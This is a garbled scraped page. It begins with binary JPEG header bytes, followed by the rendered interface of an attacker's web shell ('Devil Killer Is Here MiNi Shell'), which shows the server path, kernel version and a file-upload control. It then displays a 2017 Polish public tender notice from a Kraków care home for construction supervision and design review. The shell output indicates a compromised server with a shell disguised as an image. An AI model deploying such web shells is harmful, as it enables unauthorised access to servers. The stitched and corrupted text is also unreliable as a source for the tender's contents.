JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20170126/14601-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.dpshelclow.pl' target='_blank'>http://www.dpshelclow.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 14601 - 2017
              z dnia 2017-01-26 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kraków: Sporządzenie ekspertyzy - sprawdzenie dokumentacji projektowej opracowanej przez projektanta, organizowanie procesu inwestycyjnego, kompleksowe pełnienie nadzoru inwestorskiego nad robotami budowlanymi prowadzonymi w ramach zadania inwestycyjnego pn. : Przebudowa i rozbudowa Domu Pomocy Społecznej  im. Ludwika i Anny Helclów wraz z zagospodarowaniem terenu  II etap,  zlokalizowanego  w Krakowie przy  ul. Helclów 2. <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Dom Pomocy Społecznej im. L. A. Helclów, krajowy numer identyfikacyjny
              000293172, ul.
              ul. Helclów 
              2,
              31-148 
              Kraków, woj.
              małopolskie, państwo
              Polska, tel.
              126330828, e-mail
              sekretariat@dpshelclow.pl, faks
              126343151.
              <br />
              Adres strony internetowej (URL): www.dpshelclow.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.dpshelclow.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />w formie papierowej<br />
                Adres:
                <br />Dom Pomocy Społecznej im. L. i A. Helclów w Krakowie, 31-148 Kraków, ul. Helclów 2</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Sporządzenie ekspertyzy - sprawdzenie dokumentacji projektowej opracowanej przez projektanta, organizowanie procesu inwestycyjnego, kompleksowe pełnienie nadzoru inwestorskiego nad robotami budowlanymi prowadzonymi w ramach zadania inwestycyjnego pn. : Przebudowa i rozbudowa Domu Pomocy Społecznej  im. Ludwika i Anny Helclów wraz z zagospodarowaniem terenu  II etap,  zlokalizowanego  w Krakowie przy  ul. Helclów 2. <br /><b>Numer referencyjny: </b>DPS /ZP/2522/2532 /ZP/ U / 4 /2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiotem Umowy jest: Sporządzenie ekspertyzy - sprawdzenie dokumentacji projektowej opracowanej przez projektanta, organizowanie procesu inwestycyjnego, kompleksowe pełnienie nadzoru inwestorskiego nad robotami budowlanymi prowadzonymi w ramach zadania inwestycyjnego pn. : Przebudowa i rozbudowa Domu Pomocy Społecznej  im. Ludwika i Anny Helclów wraz z zagospodarowaniem terenu  II etap,  zlokalizowanego  w Krakowie przy  ul. Helclów 2 w zakresie branży konstrukcyjno-budowlanej, architektonicznej, drogowej, instalacyjnej sanitarnej i instalacyjnej elektrycznej.

2.	Szczegółowe warunki i zakres zamówienia określono we wzorze umowy stanowiącej Załącznik nr 5 do niniejszej Specyfikacji istotnych warunków zamówienia.
3.	ZAKRES USŁUG DOTYCZĄCYCH SPORZĄDZENIA EKSPERTYZY DOKUMENTACJI PROJEKTOWEJ.
3.1. Celem zamówienia jest :
a)	wyeliminowanie ewentualnych błędów dokumentacji projektowej będącej w posiadaniu Zamawiającego poprzez uzyskanie ekspertyzy dotyczącej sprawdzenia dokumentacji projektowej opracowanej przez projektanta, będącej w posiadaniu Zamawiającego (nie dotyczy sprawdzenia, o którym mowa w art.20 ust. 2 Ustawy Prawo Budowlane),
b)	zapewnienie płynnego i prawidłowego wdrożenia umowy na roboty budowlane oraz sprawnego przebiegu procesu inwestycyjnego i terminowego wykonania robót budowlanych i uzyskania pozwoleń na użytkowanie poprzez organizację inwestycji przez Wykonawcę.

3.2.	Wykonanie ekspertyzy dokumentacji projektowej:
     EKSPERTYZA dotyczy : 
I  ETAP

a)	Remontu i przebudowy instalacji kanalizacji sanitarnej zewnętrznej i opadowej oraz obiektów sieciowych, remontu i przebudowy alejek, dróg wewnętrznych i placów na terenie DPS wraz z oświetleniem terenu, izolacją ścian fundamentowych, budowa miejsca do rekreacji i warsztatów  polegająca na budowie alejek pieszych, placów, obiektów małej architektury, ogródka warzywnego, montażu stołu do prac ogrodniczych, stołu do ping ponga i grilla (obszar C1,C2, C3) wraz z budową dźwigu osobowo-towarowego i budową linii zasilającej z agregatu prądotwórczego do rozdzielni pożarowej,

II  ETAP 


a)	Dostosowania budynku głównego do wymagań przepisów przeciwpożarowych 
b)	Budowę poziomów i pionów instalacji wod-kan w części środkowej piwnic i parteru budynku głównego do poziomu posadzki pierwszego piętra oraz wykonanie posadzki na parteru budynku głównego,
c)	Wykonania instalacji słaboprądowej  instalacji logicznej  w budynku głównym, wykonanie instalacji hydrantowej w budynku głównym.

III ETAP  - pozostałej dokumentacji w zakresie:

a)	Kontynuacji instalacji wysokociśnieniowej mgły wodnej w budynku głównym,
b)	Przebudowy części środkowej budynku głównego  wszystkie branże oraz kontynuacja dostosowania budynku do przepisów ochrony p.poż. (część nie ujęta w  II etapie),
c)	Rozbudowy wewnętrznej pozabudynkowej instalacji kanalizacji ogólnospławnej, budowa wewnętrznej pozabudynkowej instalacji oświetlenia terenu, izolacją ścian fundamentowych, rozbudowa wewnętrznych dróg, placów utwardzonych i alejek pieszych, na potrzeby Domu Pomocy Społecznej im L. A. Helclów, na działce nr 116/14 obr. 116 Śródmieście przy ul. Helclów 2 w Krakowie (pozostały obszar nie ujęty w I Etapie ust. 1) poz. a),
d)	Remontu ogrodzenia przy Domu Pomocy Społecznej im Anny i Ludwika Helclów, ul. Helclów 2 w Krakowie(poza już wykonanym segmentem Nr IV muru ogrodzeniowego.
4.	ZAKRES USŁUG dotyczących organizowanie procesu inwestycyjnego, kompleksowe pełnienie nadzoru inwestorskiego nad robotami budowlanymi prowadzonymi w ramach zadania inwestycyjnego pn. : Przebudowa i rozbudowa Domu Pomocy Społecznej  im. Ludwika i Anny Helclów wraz z zagospodarowaniem terenu  II etap

4.1. Celem zamówienia jest :
a)	zapewnienie, poprzez nadzór inwestorski:
i.	wykonania robót budowlanych o odpowiedniej jakości, zgodnej ze sztuką budowlaną w zgodności z dokumentacją projektową i obowiązującymi przepisami prawa oraz umową na wykonanie robót budowlanych, w tym zapewnienie odpowiedniego tempa prowadzenia prac zgodnego z oczekiwaniami Zamawiającego,
ii.	odpowiednio wykwalifikowanych osób, które będą rozwiązywały ewentualne problemy i nieprawidłowości, które mogą powstać w trakcie procesu inwestycyjnego.
4.2.	Pełnienie obowiązków  Inspektora Nadzoru polegać będzie na:  
a)	dokonywaniu sprawdzania dokumentów dostarczonych, w toku pełnienia Nadzoru Inwestorskiego, w tym kosztorysów, harmonogramów rzeczowo-finansowych,  certyfikatów, atestów protokołów z prób i badań, a także sporządzenie protokołów konieczności  w ciągu 3 dni od dnia otrzymania materiałów 
b)	podejmowaniu czynności w ramach Nadzoru nad procesem inwestycyjnym oraz  sporządzaniu protokołów i opinii wymaganych postanowieniami Umowy  w ciągu 3 dni od dnia otrzymania dokumentów do zaopiniowania lub sprawdzenia lub zaistnienia okoliczności, na które zgodnie z Umową winien reagować,
c)	informowaniu Inwestora o wszelkich problemach, nieprawidłowościach i utrudnieniach, które mogą wpłynąć na brak możliwości realizacji inwestycji lub wydłużyć okres realizacji inwestycji  w terminie do 3 dni od dnia, w którym Inspektor Nadzoru  powziął lub mógł powziąć przy zachowaniu należytej staranności informację w tym zakresie,
d)	braniu udziału w wizjach w okresie obowiązywania odpowiedzialności Wykonawcy robót   z tytułu rękojmi oraz gwarancji udzielonej przez Wykonawcę robót - w terminie wyznaczonym przez Inwestora,
e)	sprawowaniu Nadzoru Inwestorskiego  przez cały okres prowadzenia robót budowlanych.
4.3.	Wykonawca ponosi odpowiedzialność za wadliwe sprawdzenie I i II etapu  robót budowlanych, które powinny być wykonane w terminie do dnia 31 grudnia 2017 r., jeżeli w toku procesu inwestycyjnego powstanie potrzeba wykonania dodatkowych prac, wobec niewłaściwego zweryfikowania zakresu prac przyjętych w poszczególnych etapach.
4.4.	Przedmiot zamówienia wykonany będzie w oparciu o Dokumentację przetargową, Dokumentację projektową,  Ofertę Wykonawcy a także przeprowadzoną wizję lokalną na terenie prowadzenia robót budowlanych.
4.5.	Zamawiający przekaże wybranemu Wykonawcy dokumentację wymienioną powyżej w następującej ilości:
a)	przed rozpoczęciem realizacji procesu inwestycyjnego Zamawiający ( bezpłatnie ) przekaże Inspektorowi Nadzoru dokumentację projektową oraz dokumentację STWiORB w wersji papierowej  i elektronicznej, która stanowi jego własność i może być wykorzystana wyłącznie do celu wykonania przedmiotu Umowy, zgodnie z jej przeznaczeniem,
b)	Inspektor Nadzoru inwestorskiego dokona zwrotu otrzymanej dokumentacji projektowej                i STWiORB, najpóźniej w dniu rozliczenia rzeczowo-finansowego między stronami Umowy.
c)	zakończenie robót  budowlanych nastąpi na podstawie dokonanego protokolarnego odbioru końcowego.
4.6.	Wykonawca, z którym zostanie zawarta Umowa zobowiązany jest do odbioru Dokumentacji   Projektowej.
4.7.	UWAGA:  Zamawiający zastrzega, że z uwagi na ilość środków finansowych które posiada Zamawiający oraz technologię wykonania robót, istnieje prawdopodobieństwo, że część robót budowlanych nie zostanie zrealizowana w bieżącym roku, wobec czego zakres rzeczowy zamówienia może zostać ograniczony z równoczesnym proporcjonalnym zmniejszeniem wysokości wynagrodzenia. Z tego tytułu Wykonawcy nie przysługują żadne roszczenia. 
<br /><br /><b>II.5) Główny kod CPV: </b>71247000-1<br /><b> Dodatkowe kody CPV:</b>71221000-3<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                	Zamawiający   przewiduje możliwości udzielenia zamówienia,  o którym mowa w art. 67 ust. 1 pkt 6) ustawy Pzp., o wartości nie większej niż 50%  zamówienia podstawowego.<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 28/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                2.3.1.	Wykonawca wykaże, że dysponuje osobami zdolnymi do realizacji zamówienia, tj.: 

osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadają uprawnienia i doświadczenie wymagane przepisami ustawy Prawo Budowlane, uprawniające do wykonywania zakresu objętego zamówieniem, w specjalnościach adekwatnych do wykonywania zakresu robót budowlanych w poszczególnych branżach:

Pełnienie funkcji inspektora nadzoru inwestorskiego

1)	do pełnienia funkcji inspektora nadzoru w branży konstrukcyjno-budowlanej (KOORDYNATORA  WSZYSTKICH BRANŻ) :
a)	wymagane są uprawnienia budowlane osoby, do kierowania robotami budowlanymi bez ograniczeń, w specjalności konstrukcyjno-budowlanej, a ponadto odbył co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych, 
oraz 
b)	 doświadczenie zawodowe: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, osoba ta była inżynierem kontraktu lub inspektorem nadzoru inwestorskiego lub kierownikiem budowy (w rozumieniu Ustawy Prawo Budowlane) przy realizacji minimum 1 zadania polegającego na budowie lub rozbudowie lub remoncie lub przebudowie obiektu wraz z instalacjami wewnętrznymi będącego pod nadzorem konserwatora zabytków z uwagi na charakter budynku, który był wpisany do rejestru zabytków lub z uwagi na lokalizację wykonywanych robót, która znajdowała się w strefie wpisanej do rejestru zabytków objętej nadzorem konserwatora zabytku, o wartości zadania (wartość całej roboty budowlanej ze wszystkimi branżami) minimum  1 000.000 złotych  brutto każda (słownie: jeden milion złotych). 

2)	do pełnienia funkcji inspektora nadzoru w branży instalacyjnej 
a)	wymagane są  uprawnienia budowlane osoby, która posiada uprawnienia budowlane do kierowania robotami budowlanymi  w specjalności instalacyjnej bez ograniczeń w zakresie : sieci; instalacji i urządzeń cieplnych;  wentylacyjnych; gazowych ; wod  kan ; 
oraz 
b)	 w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie , osoba ta była inspektorem nadzoru inwestorskiego lub kierownikiem budowy/robót przy realizacji minimum  1 zadania polegającego na budowie lub rozbudowie lub remoncie lub przebudowie  obiektu wraz z instalacjami wewnętrznymi będącego pod nadzorem konserwatora zabytków z uwagi na charakter budynku, który był wpisany do rejestru zabytków lub z uwagi na lokalizację wykonywanych robót, która znajdowała się w strefie wpisanej do rejestru zabytków objętej nadzorem konserwatora zabytku, o wartości zadania (wartość całej roboty budowlanej ze wszystkimi branżami) minimum 500 000 złotych brutto każda (słownie: pięćset tysięcy złotych). 

3)	do pełnienia funkcji inspektora nadzoru w branży urządzeń elektrycznych i elektroenergetycznych

a)	wymagane są  uprawnienia budowlane osoby, która posiada uprawnienia budowlane do kierowania robotami budowlanymi  w specjalności instalacyjnej bez ograniczeń w zakresie : sieci; instalacji urządzeń elektrycznych i elektroenergetycznych; 


4)	do pełnienia funkcji inspektora nadzoru w branży drogowej



a)	wymagane są  uprawnienia budowlane osoby, która posiada uprawnienia budowlane do kierowania robotami budowlanymi  w specjalności bez ograniczeń w zakresie dróg.


Sporządzenie ekspertyzy:
1)	 W zakresie branży konstrukcyjno-budowlanej:
a)	wymagane są uprawnienia budowlane do projektowania bez ograniczeń  w specjalności konstrukcyjno-budowlanej 
oraz 
b)	w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie doświadczenie zawodowe, osoba wykonała co najmniej 1 (jedną) ekspertyzę dotyczącą poprawności wykonania dokumentacji projektowej  remontu, rozbudowy, przebudowy lub budowy obiektu o powierzchni użytkowej co najmniej 4.000 m2 powierzchni użytkowej, lub opracował dokumentację projektową przebudowy lub budowy obiektu o powierzchni użytkowej co najmniej 4 000 m2 i kubaturze co najmniej 15 000 m3 w zakresie zgodnym z posiadanymi uprawnieniami o wartości wynagrodzenia - minimum za sporządzenie ekspertyzy lub opracowania dokumentacji projektowej 15 000 złotych  brutto  (słownie: piętnaście  tysięcy złotych).

2)	W zakresie branży instalacyjnej (wentylacja, instalacje, c.o., wod-kan., gazowa):
a)	wymagane są  uprawnienia budowlane osoby, która posiada uprawnienia budowlane do projektowania bez ograniczeń  w specjalności instalacyjnej w zakresie : sieci; instalacji i urządzeń cieplnych;  wentylacyjnych; gazowych; wod  kan ; 
oraz 
b)	w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, osoba ta wykonała co najmniej 1 (jedną) ekspertyzę dotyczącą poprawności wykonania dokumentacji projektowej w zakresie instalacji wewnętrznych:  wentylacji, c.o., wod  kan, gazowej dotyczącej budowy lub przebudowy obiektu o powierzchni użytkowej co najmniej 4.000 m2 powierzchni użytkowej, lub opracowała dokumentacje projektową  w zakresie instalacji wewnętrznych:  wentylacji, c.o., i wod  kan dotyczącej budowy, remontu, rozbudowy lub przebudowy obiektu o powierzchni użytkowej co najmniej 4.000 m2 w zakresie zgodnym z posiadanymi uprawnieniami o wartości  wynagrodzenia -  minimum za sporządzenie ekspertyzy lub opracowania dokumentacji projektowej 15 000 złotych  brutto  (słownie: piętnaście  tysięcy złotych).


3)	W zakresie branży instalacyjnej  instalacje elektryczne:
a)	wymagane są  uprawnienia budowlane osoby, która posiada uprawnienia budowlane do projektowania bez ograniczeń  w specjalności instalacyjnej w zakresie: sieci; instalacji urządzeń elektrycznych i elektroenergetycznych;  
oraz 
b)	w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie osoba ta wykonała co najmniej 1 (jedną) ekspertyzę dotyczącą poprawności wykonania dokumentacji projektowej w zakresie instalacji wewnętrznej elektrycznej obiektu o powierzchni użytkowej co najmniej 4.000 m2 powierzchni użytkowej, lub opracowała dokumentację projektową w zakresie instalacji wewnętrznej  elektrycznej obiektu o powierzchni użytkowej  co najmniej 4.000 m2 w zakresie zgodnym z posiadanymi uprawnieniami o wartości  wynagrodzenia - minimum za sporządzenie ekspertyzy lub opracowania dokumentacji projektowej 15 000 złotych  brutto  (słownie: piętnaście  tysięcy złotych).


4)	W zakresie branży architektonicznej :
a)	wymagane są  uprawnienia budowlane osoby, która posiada uprawnienia budowlane do projektowania bez ograniczeń  w zakresie architektury;
5)	W zakresie branży drogowej:
a)	wymagane są  uprawnienia budowlane osoby, która posiada uprawnienia budowlane do projektowania bez ograniczeń  w zakresie dróg

U w a g a  :  Zamawiający dopuszcza łączenie funkcji inspektora nadzoru poszczególnych branż oraz wykonania ekspertyzy lub jej części pod warunkiem, że osoby, które będą wykonywały poszczególne elementy zamówienia będą posiadać odpowiednie kwalifikacje zawodowe i doświadczenie określone przez Zamawiającego. 
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
